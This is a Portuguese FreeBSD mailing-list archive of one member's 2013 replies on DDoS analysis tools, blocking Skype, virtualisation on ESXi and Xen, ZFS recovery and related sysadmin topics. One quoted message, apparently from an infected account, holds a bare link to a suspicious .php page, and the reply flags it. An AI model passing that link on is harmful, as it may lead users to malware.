 Mas seria bom saber se caso precisasse de algo que tivesse somente no
 current, eu pudesse aproveitar pra algo não crítico.

 Grande abraço à todos,
 Gondim


Gondim, fugindo um pouco da thread...

E aquele problema do PPPOE? Voltou para o Linux?

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Ferramenta para análise de DDoS

[Welkson Renny de Medeiros]

Em 27 de julho de 2013 20:32, Marcelo Gondim gon...@bsdinfo.com.brescreveu:

 Grande Welkson,

 Então, o objetivo é fazer um levantamento rápido pra tentar ver junto à
 minha fornecedora de link. Tive um problema menor que esse um tempo
 atrás e consegui resolver tirando o IP de destino do ar. Esse que tive
 nessa madruga foi um ataque de 2Gbps onde meus 2 links ficaram cheios.  :(
 O que me deixa puto com essas coisas é saber que tem muito servidor aí
 comprometido por falta de cuidado dos sysadmins. Você ser invadido é uma
 coisa mas não detectar o problema posteriormente, deixando o servidor
 servir de agente zumbi são outros quinhentos. Será que o cara não olha
 em nenhum momento o gráfico de consumo dele mensal? Todo Datacenter te
 dá isso. Alguns montam o servidor e largam à bangu.
 Se todos fizessem a sua parte a coisa poderia ser um pouco melhor. :)

 Vou olhar os links que você passou e também estou aqui na procura.
 Obrigadão!



Verdade Gondim.

Administro poucos servidores FreeBSD, e mesmo assim fico assustado quando
rodo um portaudit e surge vários pacotes com vulnerabilidades... se o
camarada brincar a galera entra mesmo.

Um outro dado alarmanete é a quantidade de smartphones comprometidos...
muita gente baixa .apk ou .ipa (android e iphone respectivamente) no
4shared e instala sem saber a procedência. Imagina um monte de smartphone
usando 4G sendo infectado e participando de botnet?

Complicado...

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Ferramenta para análise de DDoS

[Welkson Renny de Medeiros]

Em 28 de julho de 2013 12:36, Welkson Renny de Medeiros
welk...@gmail.comescreveu:

 Verdade Gondim.

 Administro poucos servidores FreeBSD, e mesmo assim fico assustado quando
 rodo um portaudit e surge vários pacotes com vulnerabilidades... se o
 camarada brincar a galera entra mesmo.

 Um outro dado alarmanete é a quantidade de smartphones comprometidos...
 muita gente baixa .apk ou .ipa (android e iphone respectivamente) no
 4shared e instala sem saber a procedência. Imagina um monte de smartphone
 usando 4G sendo infectado e participando de botnet?

 Complicado...

 Welkson


Onde tem alarmanete leia alarmante  =)

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Ferramenta para análise de DDoS

[Welkson Renny de Medeiros]

Em 27 de julho de 2013 13:37, Marcelo Gondim gon...@bsdinfo.com.brescreveu:

 Pessoal,

 Estou procurando alguma ferramenta para que me facilite analisar um
 ataque DDoS que esteja passando pelo meu router FreeBSD, me permitindo
 identificar as origens e destino do ataque. Sei que é complicado
 garantir a origem do ataque mas qualquer coisa já ajuda. Porque se não
 for pela origem vai pelo destino mesmo.  ;)
 Hoje tenho feito isso com jnettop e tcpdump mas se existir alguma ou
 algumas outras ferramentas seria interessante.  :)

 []'s
 Gondim



Mestre Gondim, nunca passei por isso, mas pelo que sei não adianta bloquear
no firewall, afinal o pacote vai ocupar o meio físico e comprometer a
banda... mas fiquei curioso quanto a análise do ataque, fiz algumas
pesquisas, encontrei essa ferramenta:

http://nfsen.sourceforge.net

Screenshots:
http://nfsen.sourceforge.net/#mozTocId301830

Já pensou em usar CloudFlare?

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF] - Morte do Pedro Madsen

[Welkson Renny de Medeiros]

Em 17 de julho de 2013 16:41, Paulo Henrique - BSDs Brasil 
paulo.rd...@bsd.com.br escreveu:

 Em 17/07/2013 15:56, mantunes escreveu:
  Deve ter sido selecionado por irado para trabalhar com ele..
 
  Que fique em paz..



RIP!

O Irado tinha uma certa idade, mas o Madsen, se for esse da foto [1],
aparentava ser bastante jovem.

[1] https://twitter.com/MadsenPedro

Descanse em paz!

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Como Bloquear Skype

[Welkson Renny de Medeiros]

Em 6 de julho de 2013 15:23, Vinícius Zavam egyp...@googlemail.comescreveu:

 algo contra snort/suricata?
  uma pagina da universidade de columbia reune alguns
 documentos/artigos/slides interessantes; vale a pena perder um tempo
 lendo para ajustar a solucao no teu cenario.

 --
 Vinícius Zavam
 profiles.google.com/egypcio



Usei muito tempo atrás o Snort + OSSEC com Active Response... recente fiz
alguns testes com o Suricata. Poste o link dessa páigna que comentou
(Google não ajudou muito :p  ).

Acho bem difícil detectar algum padrão no tráfego do Skype (as regras que
encontrei são bem antigas):
http://www.md3v.com/block-skype-with-snort
http://www.carbonwind.net/Firewalls/BlockingSkypewithPfsenseandSnort/BlockingSkypewithPfsenseandSnort.htm

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Como Bloquear Skype

[Welkson Renny de Medeiros]

2013/7/5 Luciano Bissoli luciano.biss...@bsd.com.br

 Alguem chegou em alguma solução para o bloqueio do skype??



Luciano, bom dia!

Mesmo usando L7 é difícil bloquear, é tudo criptografado, veja:
http://l7-filter.sourceforge.net/protocols

Poderia indicar o ipfw-classifyd que é baseado no iptables-l7 (usa as
mesmas regras), mas de acordo com o link acima mesmo o iptables-l7 (Linux)
não consegue bloquear o skype.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Como Bloquear Skype

[Welkson Renny de Medeiros]

Em 5 de julho de 2013 13:42, Rogério Moura roger...@gmail.com escreveu:


 Eu fiz isso uma vez usando o squid
 Segue um exemplo:

 http://www.htmlstaff.org/ver.php?id=23808

 Lembrando que para isso funcionar, não pode ser com proxy transparente, seu
 firewall deve bloquear acesso direro a Internet na porta 80 e 443 forçando
 assim passar pelo squid



Fiz isso em alguns clientes que usam pfSense... bloqueei todas as portas, e
deixei o acesso somente via proxy, e no proxy bloqueei tudo, liberando
apenas domínios governamentais... dessa forma você bloqueia o Skype (como
também Tor, etc.)... o problema é que isso gera MUITO trabalho para o TI
rsrs... por exemplo, em um supermercado onde o setor de compras precisa
acessar diversos sites de fornecedores, fazer buscas no Google, etc...
enfim, em alguns ambientes é inviável.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [Off-Topic] - Compatibilidade do Freebsd em Servidores Dell PowerEdge

[Welkson Renny de Medeiros]

Em 25 de junho de 2013 15:18, Eng Eder de Souza eder.so...@bsd.com.brescreveu:

 Ola lista !

 O pessoal da lista tem usado o FreeBSD sem grandes problemas em servidores
 Dell PowerEdge ?

 Estou enfrentando alguns problemas com um R720, a controladora de rede
 BCM5720 insiste em dar watchdog timeout -- resetting error, estou usando
 o FreeBSD 9.1, compilei alguns drivers do fabricante para Freebsd, mas
 ainda  sem efeito :-(.

 Estou tentando recompilar o kernel para a versão stable e ver se o problema
 some, não estou com muita esperança que isso resolva ...

 Uma outra duvida, alguém usa HBA QLogic 2560 no FreeBSD 9.1 ?

 Agradeço se alguém tiver dicas !


 Eder



Bom dia Eder.

Tenho alguns T410 e T300, e quando fui instalar o FreeBSD acabei abortando
por não ter como rodar o sistema de gerenciamento da Dell (OpenManage eu
acho). Acabei optando por instalar o ESXi (tem um bundle do sistema de
gerenciamento fornecido pela Dell) e deixar o BSD como guest. Roda muito
bem. Logicamente tenho alguma perda de desempenho por causa da camada de
virtualização, mas a facilidade de manutenção acaba compensando (tipo, faço
backup das máquinas virtuais, e quando necessário posso mover para outro
hardware).

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [OFF-TOPIC]Como ter garantia de ser respondido sobre dúvidas de BSD?

[Welkson Renny de Medeiros]

Em 22 de junho de 2013 11:38, Jorge Luis Carvalho Santos 
jorgeassembl...@outlook.com escreveu:

 Eric Raimond diz no guia Como fazer perguntas inteligentes, no título
 Antes de perguntar, Nunca assuma que você merece uma resposta. Você não
 merece; você não está, afinal de contas, pagando por este serviço. Você irá
 ganhar uma resposta, se ganhar, fazendo perguntas substanciais,
 interessantes e intrigantes - uma que contribua com a experiência da
 comunidade ao invés de apenas extrair conhecimentos dos outros.
 Se o usuário não ganhar a resposta ou se as comunidades de BSD, por
 exemplo, a lista e o fórum FUG-BR estiverem paradas,  a quem se deve pagar
 para ter garantia de ser respondido sobre dúvida de BSD?
 Para mim será frustrante fazer o FreeBSD Server e System Administration da
 FreeBSD Brasil se depois de fazer esse curso não ganhar resposta de
 comunidade BSD ou se as comunidades de BSD estiverem paradas, pois não sei
 inglês para ser ajudado pela freebsd.org.



Essa foi boa rsrsrsrs

Não quero gerar flame war, até porque também uso Linux para alguns serviços
em específico, mas as listas de discussão de Linux aqui no Brasil são muito
mais paradas que essa (geralmente só rola spam =)   (se bem que de parada
essa lista não tem nada)

Jorge, por favor, não me entenda mal, qual seu objetivo nessa lista? desde
que entrou só vejo perguntas não técnicas que sempre termina em confusão.

Em nenhuma lista de discussão de software livre há garantia de resposta!
Não sei de onde tirou isso!

Mas se quer PAGAR pra ter suporte profissional de FreeBSD, fale com Patrick
que a FreeBSD Brasil fornece esse tipo de serviço.

Lembrei da piada de um amigo: o povo quer ir para o céu mas não quer
morrer k

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Timeout SSH

[Welkson Renny de Medeiros]

Em 20 de junho de 2013 02:42, Rodrigo Gonçalves Crescencio 
rodr...@rcsolucoesinteligentes.com.br escreveu:

 Pessoal bom dia !



 Estou tentando configurar o timeout do SSH, porem o mesmo não está atuando,
 no sshd_config foram descomentadas e configuradas as linhas abaixo:



 #ClientAliveInterval 15

 #ClientAliveCountMax 3



Acredito que esse parâmetro não detecta inatividade.

Veja se isso ajuda:
http://www.dicas-l.com.br/arquivo/variavel_tmout.php#.UcLznD5gZvY
http://forums.freebsd.org/showthread.php?t=6171

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] NetBSD - XEN.

[Welkson Renny de Medeiros]

Em 18 de junho de 2013 03:33, Paulo Henrique paulo.rd...@bsd.com.brescreveu:

 E alguem ai usa VirtualBox ?

 Não me aprofundei muito, mais estou a transferir 11 maquinas virtuais de
 servidores e em 3 anos nunca tive problemas.
 O Ambiente é FreeBSD como hospedeiro de 6 maquinas Win7, 3 Win Server 2K3 e
 2 WinXP
 Não utilizou redundância ainda, para isso dois novos servidores estão a
 caminho.


 --
 :=)(=:
 Rip NoRm4nD.
 Flamers  /dev/null !!!



Com FreeBSD não, mas tenho com Linux CentOS (servidor de homologação de
aplicações Java).

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] NetBSD - XEN.

[Welkson Renny de Medeiros]

Em 18 de junho de 2013 07:20, Welkson Renny de Medeiros
welk...@gmail.comescreveu:


 Com FreeBSD não, mas tenho com Linux CentOS (servidor de homologação de
 aplicações Java).

 Welkson



Voltando ao Xen + BSD, a BSD Magazine desse mês tem um artigo sobre o
assunto:
http://bsdmag.org/magazine/1842-freebsd-on-rails

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] NetBSD - XEN.

[Welkson Renny de Medeiros]

Em 17 de junho de 2013 10:20, Adiel de Lima Ribeiro 
adiel.netad...@gmail.com escreveu:

 O post está ficando interessante.
  Eu não falei que Vmware é ruim, pelo contrário, é uma ótima ferramenta
 de virtualização. Apesar de a escolha da ferramenta não depender
 unicamente de nós do TI, eu acredito que seja desperdício de
 conhecimento e $$$ utilizarmos o Vmware, sendo que podemos utilizar o
 Xen.
 --
 att,
 Adiel de Lima Ribeiro



Adiel, bom dia!

O FreeBSD roda bem como guest no Xen? (desempenho, estabilidade, etc.)

Como host eu sei que tem uma galera trabalhando (mas ainda não tá 100%):
http://blog.xen.org/index.php/2012/09/12/freebsd-xen-support-a-quick-status-update/

O VMWare atende bem, mas sempre tive vontade de montar pelo menos um dos
servidores com Xen (Amazon e outras gigantes usam), mas na época que
iniciei a implantação dos servidores virtualizados (uns 3 anos atrás), o
Xen não me parecia uma boa solução pra FreeBSD (faz tempo, não lembro
exatamente o motivo).

Mas enfim, pretendo dar uma estudada no Xen. Eu acredito que é até mais
tranquilo para integrar com o OpenStack (que também pretendo estudar mais a
fundo).

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] NetBSD - XEN.

[Welkson Renny de Medeiros]

Em 17 de junho de 2013 12:13, Adiel de Lima Ribeiro 
adiel.netad...@gmail.com escreveu:

 Welkson, bom dia.
  Roda sim, inclusive o Amazon até oferece servidores FreeBSD, e a
 plataforma que eles utilizam é o XEN, falando nisso, mais 2 gigantes que
 o utilizam, Google e NASA.
 Eu não me lembro bem, mas parece que o XEN ficou abandonado uns tempos
 atrás, mas agora está a todo o vapor.
 Aqui na página do projeto XEN, existem alguns casos de sucesso para quem
 se interessar:
 http://www.xenproject.org/users/success-stories.html

 --
 att,
 Adiel de Lima Ribeiro




Amazon oferece FreeBSD? tem mais detalhes?

Pelo que vi, trata-se do port que o Perciva vem trabalhando:
http://www.daemonology.net/freebsd-on-ec2/

Mas acredito que isso não é suportado oficialmente pela Amazon (é um
hack).

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] NetBSD - XEN.

[Welkson Renny de Medeiros]

Em 17 de junho de 2013 14:04, Adiel de Lima Ribeiro 
adiel.netad...@gmail.com escreveu:

 Não sei se é hack, mas em nosso plano, tinhamos a opção de servidores
  FreeBSD, na página deles tem a opção.
 https://aws.amazon.com/marketplace/pp/B00AA25MLK

 --
 att,
 Adiel de Lima Ribeiro



FreeBSD (64-bit cluster compute)
Sold by: Colin Percival  --

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] NetBSD - XEN.

[Welkson Renny de Medeiros]

Em 14 de junho de 2013 18:47, Renato Frederick
ren...@frederick.eti.brescreveu:

 Não é flame war, apenas acho importante postar na lista que o vmware
 funciona OK com BSD, senão daqui a pouco vai ter gerente de TI que joga
 no google sobre isto, vai ver na lista e falar: Não vamos usar BSD no
 vmware porque é ruim.


 Escala depois para 3 máquinas, faz um cluster com load balance + um NAS
 fiber ou iscsi, que aí vamos entender que é preciso solução de mercado.



Verdade Renato.

Uso FreeBSD 9.1 amd64 (com ZFS) no ESXi 5.1 a 6 meses e até agora nenhum
problema (Dell T410 com RAID 1 usando discos SAS 15K RPM).

Pra fechar o pacote é só usar o Veeam para fazer backup das VM's.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Livro FreeBSD - O poder dos servidores em suas mãos

[Welkson Renny de Medeiros]

Em 14 de junho de 2013 13:34, mateus schott mateussch...@gmail.comescreveu:

 Muito obrigado pelo retorno pessoal! Vou entrar em contato com a editora.




Recomendo o livro! Comprei assim que foi lançado.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Como Bloquear Skype

[Welkson Renny de Medeiros]

Em 14 de junho de 2013 07:12, Tiago Ribeiro sha...@gmail.com escreveu:

 Em 13/06/13 16:34, Luiz Gustavo S. Costa escreveu:
  On Thu, 13 Jun 2013 16:27:32 -0300 (BRT)

 Luiz, bom dia, durante esta semana pesquisando como bloquear o facebook
 via iptables, achei
 um comando bem interessante:

 whois -h whois.radb.net '!gAS32934'

 No Linux (centOS) me retorna os ranges, da mesma forma que você mostrou
 no site, só que via
 linha de comando, e depois é só jogar nas regras, até ai tudo bem.

 1- Eu entendi o que o comando faz, mais confesso que não compreendi o
 parametro !g
 2- Tentei rodar no FreeBSD e não rolou, alguém ai tem alguma dica pra
 rodar esta consulta no FreeBSD?




Aqui rolou tranquilo:

root@fw / % whois -h whois.radb.net '!gAS32934'
A939
204.15.20.0/22 69.63.176.0/20 66.220.144.0/20 66.220.144.0/21 69.63.184.0/21
69.63.176.0/21 74.119.76.0/22 69.171.255.0/24 173.252.64.0/18
69.171.224.0/19 69.171.224.0/20 103.4.96.0/22 69.63.176.0/24 173.252.64.0/19
173.252.70.0/24 31.13.64.0/18 31.13.24.0/21 66.220.152.0/21 66.220.159.0/24
69.171.239.0/24 69.171.240.0/20 31.13.64.0/19 31.13.64.0/24 31.13.65.0/24
31.13.67.0/24 31.13.68.0/24 31.13.69.0/24 31.13.70.0/24 31.13.71.0/24
31.13.72.0/24 31.13.73.0/24 31.13.74.0/24 31.13.75.0/24 31.13.76.0/24
31.13.77.0/24 31.13.96.0/19 31.13.66.0/24 173.252.96.0/19 69.63.178.0/24
31.13.78.0/24 31.13.79.0/24 31.13.80.0/24 31.13.82.0/24 31.13.83.0/24
31.13.84.0/24 31.13.85.0/24 31.13.86.0/24 31.13.87.0/24 31.13.88.0/24
31.13.89.0/24 31.13.90.0/24 31.13.91.0/24 31.13.92.0/24 31.13.93.0/24
31.13.94.0/24 31.13.95.0/24 69.171.253.0/24 69.63.186.0/24 204.15.20.0/22
69.63.176.0/20 69.63.176.0/21 69.63.184.0/21 66.220.144.0/20 69.63.176.0/20

root@fw / % uname -a
FreeBSD fw.intranet.xxx.com.br 9.1-RELEASE FreeBSD 9.1-RELEASE #2: Wed Dec
26 14:07:24 UTC 2012 r...@fw.intranet.xxx.com.br:/usr/obj/usr/src/sys/XXX
amd64

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] acessa hd com ZFS.

[Welkson Renny de Medeiros]

Em 29 de maio de 2013 18:34, Alessandro de Souza Rocha 
etherlin...@gmail.com escreveu:

 Bom galera o seguinte tinha montando um servidor FreeBSD 9.0 com zfs e
 samba servidor de arquivos, so que a placa mae do danado queimou a placa e
 antiga nao conseguir uma igual, coloquei o hd em outra maquina tentar
 recupar os arquivos so que nao estou conseguindo montar alguma dica pois
 sao 600gb de arquivos.

 --
 Alessandro de Souza Rocha
 Administrador de Redes e Sistemas
 FreeBSD-BR User #117



Fala Alessandro, beleza?

Cara, eu não sou nenhum expert em ZFS  (inclusive você me ajudou bastante
na implantação via GTalk no início desse ano =)

Alguns dias após a implantação do ZFS eu dei um vacilo no loader.conf e o
sistema deixou de bootar. Depois de muito Google eu consegui resolver e fiz
um pequeno how-to, espero que ajude:

1- boot com o CD do FreeBSD, escolha a opção LiveCD (só aparece essa
pergunta na 2 ou 3 tela);
2- Ao chegar no login, informe o usuário root, e o sistema irá acessar
sem senha;
3- Tente montar o pool ZFS da seguinte forma:
zpool set bootfs=zroot zroot
zfs set checksum=fletcher4 zroot
 zfs set mountpoint=/mnt zroot
4- Se tudo correr bem, na pasta /mnt estará seu sistema de arquivos, basta
editar o /mnt/boot/loader.conf;
5- Antes de rebootar desmonta o pool ZFS digitando:
zfs umount -a

Faz bastante tempo que usei isso, então não lembro muitos detalhes.

Abraço,

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Hardware to virtualization.

[Welkson Renny de Medeiros]

Em 20 de maio de 2013 16:26, Elias Motta
t...@engemoldeengenharia.com.brescreveu:

 Boa tarde Lista,

 Dias atras os colegas trocaram ideia a respeito de hardware pra
 virtualização ESXi, alguns sugeriram motherboard Supermicro que vai bem com
 FreeBSD. Gostaria de sugestão de onde comprar essa marca aqui no brasil.

 Obs. sou do RS.


 Elias Motta
 TI - Engemolde
 3597.2033 | 3597.8802
 t...@engemoldeengenharia.com.br




Dell funciona muito bem com ESXi (até mesmo os modelos mais básicos como
T300, T4xx, etc.).

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Fwd:

[Welkson Renny de Medeiros]

2013/4/16 Julio Cesar ju...@bsd.com.br

 http://www.bekcanmetal.com.tr/7iffuj.php


Bom dia!

Verifica seu pc Júlio, acho que está infectado.

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [off-topic] php 5.4

[Welkson Renny de Medeiros]

Em 10 de maio de 2013 15:43, Marcelo Gondim gon...@bsdinfo.com.brescreveu:

 Pessoal,

 Desculpem o off-topic novamente mas estou procurando alguma explicação
 lógica pro seguinte e até agora não encontrei nada. :(
 Em um servidor estava rodando o php 5.3 e foi atualizado para o php 5.4.
 Algumas mudanças tiveram que ser feitas, logicamente.
 Mas tudo está funcionando e do nada sou deslogado do site, não consigo
 mais me logar. Dá uns erros doidos de chamada de função com nomes
 esquisitos tipo $%ˆ_() e nos logs não diz nada que ajude.
 Tudo o que faço pra voltar à funcionar é editar o arquivo de funções
 backend/functions.php e sem alterar nada saio salvando. Pronto, volta à
 funcionar por um tempo. Não vi lógica alguma nisso até agora, só sei que
 com o php 5.3 isso não estava ocorrendo. rsrsrs

 Carabina você já viu isso? Alguém aqui da lista que programe e use o php
 5.4 já passou por isso?

 []'s
 Gondim



Gondim,

Pelo que vi, teve algumas mudanças significativas:
http://php.net/manual/en/migration54.incompatible.php
http://php.net/manual/pt_BR/migration54.php

Não tem como comentar muito sem conhecer o código da aplicação, mas
acredito que esses links possam ajudar.

Abraços,

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] FreeBSD 9.0-RELEASE Congelando

[Welkson Renny de Medeiros]

Em 18 de abril de 2013 09:39, Bruno Oliveira brnolv...@gmail.com escreveu:

 Bom dia,

 Tenho uma servidor virtualizado com FreeBSD 9.0-RELEASE* e estou passando
 por um problema estranho. Todo dia entre 08:00 e 09:00 horas o servidor
 congela, reinicio e volta ao normal.

 No ambiente do ESXi não mostra nenhum overflow de CPU/Memória/Disco.

 Qual arquivo de registro tenho que analisar para tentar entender o que está
 acontecendo? Neste servidor tenho qmail, vpopmail, apache, mysql,
 roundcube, spamassasim e clamav.

 *FreeBSD mail.domain.local 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3
 07:15:25 UTC 2012 r...@obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
 i38

 --
 Abs,

 Bruno Oliveira



Fala Bruno, beleza?

Cara, no final de 2012 eu migrei um BSD para um ambiente virtualizado (Dell
PowerEdge, discos SAS 15K RPM, rodando ESXi 5.1)... usei FreeBSD 9 amd64
(com ZFS)... desde então, não tenho o reclamar... as poucas vezes que
precisei desligar foi por causa de energia, e olha que rodo muita coisa:

* Dansguardian;
* Servidor web com vários sites, proxy reverso, etc.;
* Firewall com controle de banda;
* OpenVPN com 6 filiais penduradas;
* Samba;
* OpenFire (Java, bem pesado);
* Banco de dados (Postgres);

O único cuidado que tive foi instalar as atualizações do ESXi 5 (se não me
engano tem um patch que corrige uns bugs, entre eles o auto-start das
máquinas que não funciona), e usei o openvmwaretools que está no ports
alguns tunnigs que já usava no pc anterior no sysctl e loader.conf.

Abraços,

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Skype 4 no FreeBSD

[Welkson Renny de Medeiros]

Em 30 de janeiro de 2013 12:26, Ricardo Carlini Sperandio 
rcarl...@gmail.com escreveu:

 2013/1/24 Tiago Ribeiro sha...@gmail.com

  Em 24 de janeiro de 2013 09:22, Felipe Nogueira Oliva 
  felipe.n...@gmail.com
   escreveu:
 
   Eu ja tentei de tudo, ate emular pelo Wine.



Estava acompanhando no twitter as notícias sobre o Campus Party e vi isso:
TechEd Brasil @techedbrasil

Você usa Linux e gostaria de utilizar Skype? Isso não é mais um problema.
Agora o Skype roda no Linux!#cpbr6 Palco Sócrates!

Se alguém tiver no Campus Party, vai lá no stand da Microsoft e diga que
isso é mentira =)

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] Skype 4 no FreeBSD

[Welkson Renny de Medeiros]

Em 30 de janeiro de 2013 13:18, Ricardo Carlini Sperandio 
rcarl...@gmail.com escreveu:

 Uai,
mas o skype sempre rodou no linux, a diferença é que antes ele suportava
 tanto o oss como o alsa como o pulseaudio, agora é alsa ou nada. O problema
 não é o rodar nos linux mas sim nos BSD, ou então num linux sobre
 ARM/sparc, etc...

 --
 Ricardo Carlini Sperandio



Pois é, sempre vi Linux lá na lista de downloads do skype... mas confesso
que nunca precisei instalar Skype em ambientes *nix.

Pelo jeito a Microsoft depois que comprou o Skype já começou a dificultar
a vida de quem não usa Windows...

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] [Off-Topic] SkypeMSN

[Welkson Renny de Medeiros]

Em 25 de janeiro de 2013 15:25, Lucas Dias lucas...@gmail.com escreveu:

 Pode até funcionar, mas googlando por esses dias, achei que o Skype
 funciona na base P2P.

 Conversando com um amigo, ele me disse que liberou apenas para uma estação
 (The Boss) na rede dele, e depois de alguns dias, ele viu por coincidência,
 um outro usuário usando. Investigou e viu que só passava pelo firewall o o
 IP liberado para usar o Skype. Percebeu também, por coincidência, que
 quando o IP liberado não estava em uso, ou seja, The Boss não estava no
 prédio, o Skype realmente não funcionava.

 Resultado: Se apenas uma maquina for liberada, ela servirá de proxy para as
 outras.  Sinistro =)

 Vou fazer um PoC sobre isso e confirmo depois com meus testes.

 Além de P2P, ainda criptografa... to vendo que a solução será daqui a pouco
 da própria Skype (MS).
 --
 .:: Lucas Dias
 .:: OS3 Soluções em TI
 .:: (82) 8813-1494 / 8111-2288
 .:: Antes de imprimir, veja se realmente é necessário!!!



Lucas, percebi a mesma coisa a alguns anos.

Skype é pior que vírus =)

Esse paper é um pouco antigo, mas talvez ajude a matar a curiosidade:
http://www1.cs.columbia.edu/~library/TR-repository/reports/reports-2004/cucs-039-04.pdf

Nesse paper acima logo no começo informa o seguinte:
Any node with a public IP address having
sufficient CPU, memory, and network bandwidth is a candidate to
become a super node

Alguns outros:
http://www.ossir.org/windows/supports/2005/2005-11-07/EADS-CCR_Fabrice_Skype.pdf
http://lib.tkk.fi/Dipl/2007/urn009990.pdf
http://www.tlc-networks.polito.it/oldsite/mellia/papers/CR_skype_TMM.pdf

Welkson
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] FreeBSD no ESXi 5.1 (open-vm-tools x vmware tools oficial) - problemas com Clang

[Welkson Renny de Medeiros]

Em 10 de janeiro de 2013 09:38, Welkson Renny de Medeiros welk...@gmail.com
 escreveu:

 Senhores, bom dia!

 A cerca de 15 dias migrei um BSD antigo (FreeBSD 7.0 i386) para um novo
 hardware (Dell com HD SAS 15K RPM com RAID 1 usando controladora Perc,
 etc.). Como o novo hardware é suportado pelo VMWARE, e já uso VMWARE ESXi a
 algum tempo com outros SO`s (Linux, Windows), decidi então instalar o
 FreeBSD virtualizado.

 Baixei o FreeBSD 9.1 (ainda não tinha sido lançado a ISO oficial, por
 sorte que quando lançaram não houve qualquer mudança), e instalei a versão
 AMD 64 sobre o ESXi 5.1.

 Conversando sobre o processo de instalação com o Wellinaldo (GTalk), ele
 me sugeriu usar o ZFS (eu tinha a impressão que ZFS era meio gambiarra,
 mas muita gente já está usando em produção, então vamos lá...)... instalei
 com ZFS, etc.

 Chegou na parte de instalar o VMWARE Tools... como a VMWARE suporte o
 FreeBSD 9 (no meu caso é 9.1, não sei como fica), decidi então não usar o
 Open-VM-Tools (como o ESXi 5.1 foi lançado a pouco tempo, não sei como está
 o suporte pra ele). Montei o CD-ROM com a instalação do VMWARE-TOOLS, segui
 os passos descritos nesse site:

 http://www.rhyous.com/2012/05/09/installing-vmware-tools-on-freebsd-9-without-xorg/

 Observe que eles recomendam desativar o clang no MAKE.CONF (ou seja, usar
 o GCC puro), e recompilar o kernel... eu fiz isso, tentei recompilar, e foi
 exibido um erro exatamente na linha do make.conf que desativa o Clang (não
 lembro o erro, mas para o momento não vem ao caso).

 Tentei algumas dicas da internet, não funcionou... usei então o
 Open-VMWARE-Tools do ports... compilou tudo certinho, carregou os módulos,
 configurei o RC.CONF, etc já está em produção a algumas semanas, e está
 tudo funcionando sem problema algum.

 Minha pergunta é a seguinte: o que vocês acham mais seguro? usar o
 Open-VMWARE-Tools e seus possíveis bugs [1], ou tentar resolver esse
 problema do make.conf usar a distro oficial da vmware? (lembrando que eles
 desativam o clang, e pelo que li, o clang será o C oficial do BSD daqui pra
